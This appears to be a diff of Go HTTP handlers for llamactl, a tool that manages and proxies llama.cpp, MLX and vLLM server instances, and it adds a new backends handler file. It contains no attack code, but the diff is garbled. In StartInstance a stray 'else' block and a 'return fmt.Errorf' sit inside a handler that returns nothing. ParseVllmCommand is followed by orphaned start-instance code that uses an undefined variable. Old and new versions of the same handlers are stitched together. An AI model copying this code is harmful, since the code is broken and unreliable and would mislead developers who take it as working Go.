 			http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "application/json")
 		w.WriteHeader(http.StatusCreated)
 		// The status line is already out, so a write failure can only be logged.
 		if _, err := w.Write(payload.Bytes()); err != nil {
 			log.Printf("Failed to write instance response: %v", err)
 		}
 	}
 }
 // GetInstance godoc
 // @Summary Get details of a specific instance
 // @Description Returns the details of a specific instance by name
 // @Tags instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Process "Instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name} [get]
 func (h *Handler) GetInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instanceName := chi.URLParam(r, "name")
 		if len(instanceName) == 0 {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		// Look the instance up by the name taken from the URL.
 		found, lookupErr := h.InstanceManager.GetInstance(instanceName)
 		if lookupErr != nil {
 			http.Error(w, "Failed to get instance: "+lookupErr.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "application/json")
 		encodeErr := json.NewEncoder(w).Encode(found)
 		if encodeErr != nil {
 			http.Error(w, "Failed to encode instance: "+encodeErr.Error(), http.StatusInternalServerError)
 		}
 	}
 }
 // UpdateInstance godoc
 // @Summary Update an instance's configuration
 // @Description Updates the configuration of a specific instance by name
 // @Tags instances
 // @Security ApiKeyAuth
 // @Accept json
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Param options body instance.CreateInstanceOptions true "Instance configuration options"
 // @Success 200 {object} instance.Process "Updated instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name} [put]
 func (h *Handler) UpdateInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instanceName := chi.URLParam(r, "name")
 		if len(instanceName) == 0 {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		// Decode the new options from the JSON request body.
 		newOptions := instance.CreateInstanceOptions{}
 		decodeErr := json.NewDecoder(r.Body).Decode(&newOptions)
 		if decodeErr != nil {
 			http.Error(w, "Invalid request body", http.StatusBadRequest)
 			return
 		}
 		updated, updateErr := h.InstanceManager.UpdateInstance(instanceName, &newOptions)
 		if updateErr != nil {
 			http.Error(w, "Failed to update instance: "+updateErr.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "application/json")
 		encodeErr := json.NewEncoder(w).Encode(updated)
 		if encodeErr != nil {
 			http.Error(w, "Failed to encode instance: "+encodeErr.Error(), http.StatusInternalServerError)
 		}
 	}
 }
 // StartInstance godoc
 // @Summary Start a stopped instance
 // @Description Starts a specific instance by name
 // @Tags instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Process "Started instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name}/start [post]
 func (h *Handler) StartInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		if name == "" {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		inst, err := h.InstanceManager.StartInstance(name)
 		if err != nil {
 			// Check if error is due to maximum running instances limit
 			if _, ok := err.(manager.MaxRunningInstancesError); ok {
 				http.Error(w, err.Error(), http.StatusConflict)
 				return
 			}
-
+		} else {
-			http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
+			return fmt.Errorf("cannot start instance, maximum number of instances reached")
 			return
 		}
 		w.Header().Set("Content-Type", "application/json")
 		if err := json.NewEncoder(w).Encode(inst); err != nil {
 			http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 	}
 }
 // StopInstance godoc
 // @Summary Stop a running instance
 // @Description Stops a specific instance by name
 // @Tags instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Process "Stopped instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name}/stop [post]
 func (h *Handler) StopInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instanceName := chi.URLParam(r, "name")
 		if len(instanceName) == 0 {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		// Ask the manager to stop the instance and report its resulting state.
 		stopped, stopErr := h.InstanceManager.StopInstance(instanceName)
 		if stopErr != nil {
 			http.Error(w, "Failed to stop instance: "+stopErr.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "application/json")
 		encodeErr := json.NewEncoder(w).Encode(stopped)
 		if encodeErr != nil {
 			http.Error(w, "Failed to encode instance: "+encodeErr.Error(), http.StatusInternalServerError)
 		}
 	}
 }
 // RestartInstance godoc
 // @Summary Restart a running instance
 // @Description Restarts a specific instance by name
 // @Tags instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Process "Restarted instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name}/restart [post]
 func (h *Handler) RestartInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instanceName := chi.URLParam(r, "name")
 		if len(instanceName) == 0 {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		// Ask the manager to restart the instance and report its resulting state.
 		restarted, restartErr := h.InstanceManager.RestartInstance(instanceName)
 		if restartErr != nil {
 			http.Error(w, "Failed to restart instance: "+restartErr.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "application/json")
 		encodeErr := json.NewEncoder(w).Encode(restarted)
 		if encodeErr != nil {
 			http.Error(w, "Failed to encode instance: "+encodeErr.Error(), http.StatusInternalServerError)
 		}
 	}
 }
 // DeleteInstance godoc
 // @Summary Delete an instance
 // @Description Stops and removes a specific instance by name
 // @Tags instances
 // @Security ApiKeyAuth
 // @Param name path string true "Instance Name"
 // @Success 204 "No Content"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name} [delete]
 func (h *Handler) DeleteInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instanceName := chi.URLParam(r, "name")
 		if len(instanceName) == 0 {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		deleteErr := h.InstanceManager.DeleteInstance(instanceName)
 		if deleteErr != nil {
 			http.Error(w, "Failed to delete instance: "+deleteErr.Error(), http.StatusInternalServerError)
 			return
 		}
 		// Success carries no body, only the 204 status.
 		w.WriteHeader(http.StatusNoContent)
 	}
 }
 // GetInstanceLogs godoc
 // @Summary Get logs from a specific instance
 // @Description Returns the logs from a specific instance by name with optional line limit
 // @Tags instances
 // @Security ApiKeyAuth
 // @Param name path string true "Instance Name"
 // @Param lines query string false "Number of lines to retrieve (default: all lines)"
 // @Produces text/plain
 // @Success 200 {string} string "Instance logs"
 // @Failure 400 {string} string "Invalid name format or lines parameter"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name}/logs [get]
 func (h *Handler) GetInstanceLogs() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instanceName := chi.URLParam(r, "name")
 		if len(instanceName) == 0 {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		// An absent "lines" parameter is passed to GetLogs as -1.
 		lineCount := -1
 		if rawLines := r.URL.Query().Get("lines"); rawLines != "" {
 			parsed, parseErr := strconv.Atoi(rawLines)
 			if parseErr != nil {
 				http.Error(w, "Invalid lines parameter: "+parseErr.Error(), http.StatusBadRequest)
 				return
 			}
 			lineCount = parsed
 		}
 		target, lookupErr := h.InstanceManager.GetInstance(instanceName)
 		if lookupErr != nil {
 			http.Error(w, "Failed to get instance: "+lookupErr.Error(), http.StatusInternalServerError)
 			return
 		}
 		logText, logErr := target.GetLogs(lineCount)
 		if logErr != nil {
 			http.Error(w, "Failed to get logs: "+logErr.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "text/plain")
 		w.Write([]byte(logText))
 	}
 }
 // ProxyToInstance godoc
 // @Summary Proxy requests to a specific instance
 // @Description Forwards HTTP requests to the llama-server instance running on a specific port
 // @Tags instances
 // @Security ApiKeyAuth
 // @Param name path string true "Instance Name"
 // @Success 200 "Request successfully proxied to instance"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Failure 503 {string} string "Instance is not running"
 // @Router /instances/{name}/proxy [get]
 // @Router /instances/{name}/proxy [post]
 func (h *Handler) ProxyToInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		if name == "" {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		inst, err := h.InstanceManager.GetInstance(name)
 		if err != nil {
 			http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		if !inst.IsRunning() {
 			http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
 			return
 		}
 		// Get the cached proxy for this instance
 		proxy, err := inst.GetProxy()
 		if err != nil {
 			http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		// Strip the "/api/v1/instances/<name>/proxy" prefix from the request URL.
 		// TrimPrefix is used instead of slicing by len(prefix) so that a path
 		// that does not start with the computed prefix cannot cause an
 		// out-of-range panic or be cut at an arbitrary position.
 		prefix := fmt.Sprintf("/api/v1/instances/%s/proxy", name)
 		proxyPath := strings.TrimPrefix(r.URL.Path, prefix)
 		// Ensure the proxy path starts with "/"
 		if !strings.HasPrefix(proxyPath, "/") {
 			proxyPath = "/" + proxyPath
 		}
 		// Update the last request time for the instance
 		inst.UpdateLastRequestTime()
 		// Modify the request to remove the proxy prefix
 		originalPath := r.URL.Path
 		r.URL.Path = proxyPath
 		// Set forwarded headers. On server requests net/http moves the Host
 		// header into r.Host and removes it from r.Header, so r.Host is the
 		// only place the client-supplied host is available.
 		r.Header.Set("X-Forwarded-Host", r.Host)
 		r.Header.Set("X-Forwarded-Proto", "http")
 		// Restore original path for logging purposes
 		defer func() {
 			r.URL.Path = originalPath
 		}()
 		// Forward the request using the cached proxy
 		proxy.ServeHTTP(w, r)
 	}
 }
 // OpenAIListInstances godoc
 // @Summary List instances in OpenAI-compatible format
 // @Description Returns a list of instances in a format compatible with OpenAI API
 // @Tags openai
 // @Security ApiKeyAuth
 // @Produces json
 // @Success 200 {object} OpenAIListInstancesResponse "List of OpenAI-compatible instances"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /v1/models [get]
 func (h *Handler) OpenAIListInstances() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		all, listErr := h.InstanceManager.ListInstances()
 		if listErr != nil {
 			http.Error(w, "Failed to list instances: "+listErr.Error(), http.StatusInternalServerError)
 			return
 		}
 		// Map every instance onto one "model" entry of the response.
 		models := make([]OpenAIInstance, 0, len(all))
 		for _, inst := range all {
 			models = append(models, OpenAIInstance{
 				ID:      inst.Name,
 				Object:  "model",
 				Created: inst.Created,
 				OwnedBy: "llamactl",
 			})
 		}
 		w.Header().Set("Content-Type", "application/json")
 		encodeErr := json.NewEncoder(w).Encode(OpenAIListInstancesResponse{
 			Object: "list",
 			Data:   models,
 		})
 		if encodeErr != nil {
 			http.Error(w, "Failed to encode instances: "+encodeErr.Error(), http.StatusInternalServerError)
 		}
 	}
 }
 // OpenAIProxy godoc
 // @Summary OpenAI-compatible proxy endpoint
 // @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.
 // @Tags openai
 // @Security ApiKeyAuth
 // @Accept json
 // @Produces json
 // @Success 200 "OpenAI response"
 // @Failure 400 {string} string "Invalid request body or instance name"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /v1/ [post]
 func (h *Handler) OpenAIProxy() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// Buffer the whole body: it is inspected here for routing and must be
 		// replayed unchanged to the target instance afterwards.
 		bodyBytes, err := io.ReadAll(r.Body)
 		if err != nil {
 			http.Error(w, "Failed to read request body", http.StatusBadRequest)
 			return
 		}
 		r.Body.Close()
 		// Decode the body as a generic JSON object; only the "model" field is used,
 		// and its value is treated as the instance name.
 		var requestBody map[string]any
 		if err := json.Unmarshal(bodyBytes, &requestBody); err != nil {
 			http.Error(w, "Invalid request body", http.StatusBadRequest)
 			return
 		}
 		modelName, ok := requestBody["model"].(string)
 		if !ok || modelName == "" {
 			http.Error(w, "Instance name is required", http.StatusBadRequest)
 			return
 		}
 		// Look up the instance whose name matches the requested model
 		inst, err := h.InstanceManager.GetInstance(modelName)
 		if err != nil {
 			http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		if !inst.IsRunning() {
 			// A stopped instance is only started here when its options explicitly
 			// set OnDemandStart to true; otherwise the request is rejected with 503.
 			allowOnDemand := inst.GetOptions() != nil && inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart
 			if !allowOnDemand {
 				http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
 				return
 			}
 			// When the running-instance limit is reached, either evict the LRU
 			// instance (if enabled in config) or refuse with 409 Conflict.
 			if h.InstanceManager.IsMaxRunningInstancesReached() {
 				if h.cfg.Instances.EnableLRUEviction {
 					err := h.InstanceManager.EvictLRUInstance()
 					if err != nil {
 						http.Error(w, "Cannot start Instance, failed to evict instance "+err.Error(), http.StatusInternalServerError)
 						return
 					}
 				} else {
 					http.Error(w, "Cannot start Instance, maximum number of instances reached", http.StatusConflict)
 					return
 				}
 			}
 			// If on-demand start is enabled, start the instance
 			if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
 				http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
 				return
 			}
 			// Wait for the instance to become healthy before proceeding
 			if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // timeout is taken from the instances configuration
 				http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
 				return
 			}
 		}
 		proxy, err := inst.GetProxy()
 		if err != nil {
 			http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		// Update last request time for the instance
 		inst.UpdateLastRequestTime()
 		// The original body was consumed above, so hand the proxy a fresh reader
 		// over the buffered bytes and set ContentLength to the buffered size.
 		r.Body = io.NopCloser(bytes.NewReader(bodyBytes))
 		r.ContentLength = int64(len(bodyBytes))
 		proxy.ServeHTTP(w, r)
 	}
 }
 // ParseCommandRequest is the JSON request body accepted by the command-parsing
 // endpoints; Command carries the raw command-line string to parse.
 type ParseCommandRequest struct {
 	Command string `json:"command"`
 }
 // ParseLlamaCommand godoc
 // @Summary Parse llama-server command
 // @Description Parses a llama-server command string into instance options
 // @Tags backends
 // @Security ApiKeyAuth
 // @Accept json
 // @Produce json
 // @Param request body ParseCommandRequest true "Command to parse"
 // @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
 // @Failure 400 {object} map[string]string "Invalid request or command"
 // @Failure 500 {object} map[string]string "Internal Server Error"
 // @Router /backends/llama-cpp/parse-command [post]
 func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
 	// failure is the JSON envelope sent back for every error response.
 	type failure struct {
 		Error   string `json:"error"`
 		Details string `json:"details,omitempty"`
 	}
 	// reject writes a JSON error with the given status, error code and details.
 	reject := func(w http.ResponseWriter, status int, code, details string) {
 		w.Header().Set("Content-Type", "application/json")
 		w.WriteHeader(status)
 		_ = json.NewEncoder(w).Encode(failure{Error: code, Details: details})
 	}
 	return func(w http.ResponseWriter, r *http.Request) {
 		var payload ParseCommandRequest
 		decodeErr := json.NewDecoder(r.Body).Decode(&payload)
 		if decodeErr != nil {
 			reject(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
 			return
 		}
 		// A command consisting only of whitespace is treated as missing.
 		if len(strings.TrimSpace(payload.Command)) == 0 {
 			reject(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
 			return
 		}
 		parsed, parseErr := llamacpp.ParseLlamaCommand(payload.Command)
 		if parseErr != nil {
 			reject(w, http.StatusBadRequest, "parse_error", parseErr.Error())
 			return
 		}
 		result := instance.CreateInstanceOptions{
 			BackendType:        backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: parsed,
 		}
 		w.Header().Set("Content-Type", "application/json")
 		if encodeErr := json.NewEncoder(w).Encode(&result); encodeErr != nil {
 			reject(w, http.StatusInternalServerError, "encode_error", encodeErr.Error())
 		}
 	}
 }
 // ParseMlxCommand godoc
 // @Summary Parse mlx_lm.server command
 // @Description Parses MLX-LM server command string into instance options
 // @Tags backends
 // @Security ApiKeyAuth
 // @Accept json
 // @Produce json
 // @Param request body ParseCommandRequest true "Command to parse"
 // @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
 // @Failure 400 {object} map[string]string "Invalid request or command"
 // @Router /backends/mlx/parse-command [post]
 func (h *Handler) ParseMlxCommand() http.HandlerFunc {
 	// failure is the JSON envelope sent back for every error response.
 	type failure struct {
 		Error   string `json:"error"`
 		Details string `json:"details,omitempty"`
 	}
 	// reject writes a JSON error with the given status, error code and details.
 	reject := func(w http.ResponseWriter, status int, code, details string) {
 		w.Header().Set("Content-Type", "application/json")
 		w.WriteHeader(status)
 		_ = json.NewEncoder(w).Encode(failure{Error: code, Details: details})
 	}
 	return func(w http.ResponseWriter, r *http.Request) {
 		var payload ParseCommandRequest
 		decodeErr := json.NewDecoder(r.Body).Decode(&payload)
 		if decodeErr != nil {
 			reject(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
 			return
 		}
 		// A command consisting only of whitespace is treated as missing.
 		if len(strings.TrimSpace(payload.Command)) == 0 {
 			reject(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
 			return
 		}
 		parsed, parseErr := mlx.ParseMlxCommand(payload.Command)
 		if parseErr != nil {
 			reject(w, http.StatusBadRequest, "parse_error", parseErr.Error())
 			return
 		}
 		// mlx_lm is the only backend type this endpoint produces.
 		result := instance.CreateInstanceOptions{
 			BackendType:      backends.BackendTypeMlxLm,
 			MlxServerOptions: parsed,
 		}
 		w.Header().Set("Content-Type", "application/json")
 		if encodeErr := json.NewEncoder(w).Encode(&result); encodeErr != nil {
 			reject(w, http.StatusInternalServerError, "encode_error", encodeErr.Error())
 		}
 	}
 }
 // ParseVllmCommand godoc
 // @Summary Parse vllm serve command
 // @Description Parses a vLLM serve command string into instance options
 // @Tags backends
 // @Security ApiKeyAuth
 // @Accept json
 // @Produce json
 // @Param request body ParseCommandRequest true "Command to parse"
 // @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
 // @Failure 400 {object} map[string]string "Invalid request or command"
 // @Router /backends/vllm/parse-command [post]
 func (h *Handler) ParseVllmCommand() http.HandlerFunc {
 	type errorResponse struct {
 		Error   string `json:"error"`
 		Details string `json:"details,omitempty"`
 	}
 	writeError := func(w http.ResponseWriter, status int, code, details string) {
 		w.Header().Set("Content-Type", "application/json")
 		w.WriteHeader(status)
 		_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
 	}
 	return func(w http.ResponseWriter, r *http.Request) {
 		var req ParseCommandRequest
 		if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
 			return
 		}
 		if strings.TrimSpace(req.Command) == "" {
 			writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
 			return
 		}
 		vllmOptions, err := vllm.ParseVllmCommand(req.Command)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "parse_error", err.Error())
 			return
 		}
 		backendType := backends.BackendTypeVllm
 		options := &instance.CreateInstanceOptions{
 			BackendType:       backendType,
 			VllmServerOptions: vllmOptions,
 		}
 		w.Header().Set("Content-Type", "application/json")
 		if err := json.NewEncoder(w).Encode(options); err != nil {
 			writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
 		}
 	}
 	// If on-demand start is enabled, start the instance
 	if _, err := h.InstanceManager.StartInstance(inst.Name); err != nil {
 		return fmt.Errorf("failed to start instance: %w", err)
 	}
 	// Wait for the instance to become healthy before proceeding
 	if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil {
 		return fmt.Errorf("instance failed to become healthy: %w", err)
 	}
 	return nil
 }
--- a/pkg/server/handlers_backends.go
+++ b/pkg/server/handlers_backends.go
@@ -0,0 +1,298 @@
 package server
 import (
 	"encoding/json"
 	"fmt"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/instance"
 	"net/http"
 	"os/exec"
 	"strings"
 )
 // ParseCommandRequest is the JSON request body accepted by the backend
 // parse-command endpoints; Command carries the raw command-line string to parse.
 type ParseCommandRequest struct {
 	Command string `json:"command"`
 }
 // validateLlamaCppInstance resolves the instance referenced by the request and
 // returns it only when its backend type is llama.cpp; any lookup failure, missing
 // options or other backend type is reported as an error.
 func (h *Handler) validateLlamaCppInstance(r *http.Request) (*instance.Instance, error) {
 	target, lookupErr := h.getInstance(r)
 	if lookupErr != nil {
 		return nil, fmt.Errorf("invalid instance: %w", lookupErr)
 	}
 	opts := target.GetOptions()
 	switch {
 	case opts == nil:
 		return nil, fmt.Errorf("cannot obtain instance's options")
 	case opts.BackendOptions.BackendType != backends.BackendTypeLlamaCpp:
 		return nil, fmt.Errorf("instance is not a llama.cpp server")
 	}
 	return target, nil
 }
 // stripLlamaCppPrefix rewrites r.URL.Path in place, dropping a leading
 // "/llama-cpp/<instName>" segment when present; other paths are left untouched.
 func (h *Handler) stripLlamaCppPrefix(r *http.Request, instName string) {
 	routePrefix := "/llama-cpp/" + instName
 	trimmed := strings.TrimPrefix(r.URL.Path, routePrefix)
 	r.URL.Path = trimmed
 }
 // LlamaCppUIProxy godoc
 // @Summary Proxy requests to llama.cpp UI for the instance
 // @Description Proxies requests to the llama.cpp UI for the specified instance
 // @Tags Llama.cpp
 // @Security ApiKeyAuth
 // @Produce html
 // @Param name path string true "Instance Name"
 // @Success 200 {string} string "Proxied HTML response"
 // @Failure 400 {string} string "Invalid instance"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /llama-cpp/{name}/ [get]
 func (h *Handler) LlamaCppUIProxy() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		target, validateErr := h.validateLlamaCppInstance(r)
 		if validateErr != nil {
 			writeError(w, http.StatusBadRequest, "invalid instance", validateErr.Error())
 			return
 		}
 		// The UI is never started on demand: a local instance must already be running.
 		if !(target.IsRemote() || target.IsRunning()) {
 			writeError(w, http.StatusBadRequest, "instance is not running", "Instance is not running")
 			return
 		}
 		upstream, proxyErr := target.GetProxy()
 		if proxyErr != nil {
 			writeError(w, http.StatusInternalServerError, "failed to get proxy", proxyErr.Error())
 			return
 		}
 		// Only local instances get the "/llama-cpp/<name>" prefix removed.
 		if local := !target.IsRemote(); local {
 			h.stripLlamaCppPrefix(r, target.Name)
 		}
 		upstream.ServeHTTP(w, r)
 	}
 }
 // LlamaCppProxy godoc
 // @Summary Proxy requests to llama.cpp server instance
 // @Description Proxies requests to the specified llama.cpp server instance, starting it on-demand if configured
 // @Tags Llama.cpp
 // @Security ApiKeyAuth
 // @Produce json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} map[string]any "Proxied response"
 // @Failure 400 {string} string "Invalid instance"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /llama-cpp/{name}/props [get]
 // @Router /llama-cpp/{name}/slots [get]
 // @Router /llama-cpp/{name}/apply-template [post]
 // @Router /llama-cpp/{name}/completion [post]
 // @Router /llama-cpp/{name}/detokenize [post]
 // @Router /llama-cpp/{name}/embeddings [post]
 // @Router /llama-cpp/{name}/infill [post]
 // @Router /llama-cpp/{name}/metrics [post]
 // @Router /llama-cpp/{name}/props [post]
 // @Router /llama-cpp/{name}/reranking [post]
 // @Router /llama-cpp/{name}/tokenize [post]
 func (h *Handler) LlamaCppProxy() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		target, validateErr := h.validateLlamaCppInstance(r)
 		if validateErr != nil {
 			writeError(w, http.StatusBadRequest, "invalid instance", validateErr.Error())
 			return
 		}
 		// A stopped local instance is handed to ensureInstanceRunning before proxying.
 		if !(target.IsRemote() || target.IsRunning()) {
 			if startErr := h.ensureInstanceRunning(target); startErr != nil {
 				writeError(w, http.StatusInternalServerError, "instance start failed", startErr.Error())
 				return
 			}
 		}
 		upstream, proxyErr := target.GetProxy()
 		if proxyErr != nil {
 			writeError(w, http.StatusInternalServerError, "failed to get proxy", proxyErr.Error())
 			return
 		}
 		// Only local instances get the "/llama-cpp/<name>" prefix removed.
 		if local := !target.IsRemote(); local {
 			h.stripLlamaCppPrefix(r, target.Name)
 		}
 		upstream.ServeHTTP(w, r)
 	}
 }
 // parseHelper decodes a ParseCommandRequest from the request body, rejects blank
 // commands, and delegates to backend.ParseCommand. On any failure it writes a
 // 400 JSON error to w and returns (nil, false); on success it returns the parsed
 // options and true, leaving the response untouched.
 func parseHelper(w http.ResponseWriter, r *http.Request, backend interface {
 	ParseCommand(string) (any, error)
 }) (any, bool) {
 	var payload ParseCommandRequest
 	decodeErr := json.NewDecoder(r.Body).Decode(&payload)
 	if decodeErr != nil {
 		writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
 		return nil, false
 	}
 	// A command consisting only of whitespace is treated as missing.
 	if len(strings.TrimSpace(payload.Command)) == 0 {
 		writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
 		return nil, false
 	}
 	result, parseErr := backend.ParseCommand(payload.Command)
 	if parseErr != nil {
 		writeError(w, http.StatusBadRequest, "parse_error", parseErr.Error())
 		return nil, false
 	}
 	return result, true
 }
 // ParseLlamaCommand godoc
 // @Summary Parse llama-server command
 // @Description Parses a llama-server command string into instance options
 // @Tags Backends
 // @Security ApiKeyAuth
 // @Accept json
 // @Produce json
 // @Param request body ParseCommandRequest true "Command to parse"
 // @Success 200 {object} instance.Options "Parsed options"
 // @Failure 400 {object} map[string]string "Invalid request or command"
 // @Failure 500 {object} map[string]string "Internal Server Error"
 // @Router /api/v1/backends/llama-cpp/parse-command [post]
 func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// parseHelper has already written the error response when ok is false.
 		parsedOptions, ok := parseHelper(w, r, &backends.LlamaServerOptions{})
 		if !ok {
 			return
 		}
 		// ParseCommand returns `any`; use a checked assertion so an unexpected
 		// dynamic type yields a 500 response instead of panicking the handler.
 		llamaOptions, ok := parsedOptions.(*backends.LlamaServerOptions)
 		if !ok {
 			writeError(w, http.StatusInternalServerError, "parse_error", "Unexpected parsed options type")
 			return
 		}
 		options := &instance.Options{
 			BackendOptions: backends.Options{
 				BackendType:        backends.BackendTypeLlamaCpp,
 				LlamaServerOptions: llamaOptions,
 			},
 		}
 		writeJSON(w, http.StatusOK, options)
 	}
 }
 // ParseMlxCommand godoc
 // @Summary Parse mlx_lm.server command
 // @Description Parses MLX-LM server command string into instance options
 // @Tags Backends
 // @Security ApiKeyAuth
 // @Accept json
 // @Produce json
 // @Param request body ParseCommandRequest true "Command to parse"
 // @Success 200 {object} instance.Options "Parsed options"
 // @Failure 400 {object} map[string]string "Invalid request or command"
 // @Router /api/v1/backends/mlx/parse-command [post]
 func (h *Handler) ParseMlxCommand() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// parseHelper has already written the error response when ok is false.
 		parsedOptions, ok := parseHelper(w, r, &backends.MlxServerOptions{})
 		if !ok {
 			return
 		}
 		// ParseCommand returns `any`; use a checked assertion so an unexpected
 		// dynamic type yields a 500 response instead of panicking the handler.
 		mlxOptions, ok := parsedOptions.(*backends.MlxServerOptions)
 		if !ok {
 			writeError(w, http.StatusInternalServerError, "parse_error", "Unexpected parsed options type")
 			return
 		}
 		options := &instance.Options{
 			BackendOptions: backends.Options{
 				BackendType:      backends.BackendTypeMlxLm,
 				MlxServerOptions: mlxOptions,
 			},
 		}
 		writeJSON(w, http.StatusOK, options)
 	}
 }
 // ParseVllmCommand godoc
 // @Summary Parse vllm serve command
 // @Description Parses a vLLM serve command string into instance options
 // @Tags Backends
 // @Security ApiKeyAuth
 // @Accept json
 // @Produce json
 // @Param request body ParseCommandRequest true "Command to parse"
 // @Success 200 {object} instance.Options "Parsed options"
 // @Failure 400 {object} map[string]string "Invalid request or command"
 // @Router /api/v1/backends/vllm/parse-command [post]
 func (h *Handler) ParseVllmCommand() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// parseHelper has already written the error response when ok is false.
 		parsedOptions, ok := parseHelper(w, r, &backends.VllmServerOptions{})
 		if !ok {
 			return
 		}
 		// ParseCommand returns `any`; use a checked assertion so an unexpected
 		// dynamic type yields a 500 response instead of panicking the handler.
 		vllmOptions, ok := parsedOptions.(*backends.VllmServerOptions)
 		if !ok {
 			writeError(w, http.StatusInternalServerError, "parse_error", "Unexpected parsed options type")
 			return
 		}
 		options := &instance.Options{
 			BackendOptions: backends.Options{
 				BackendType:       backends.BackendTypeVllm,
 				VllmServerOptions: vllmOptions,
 			},
 		}
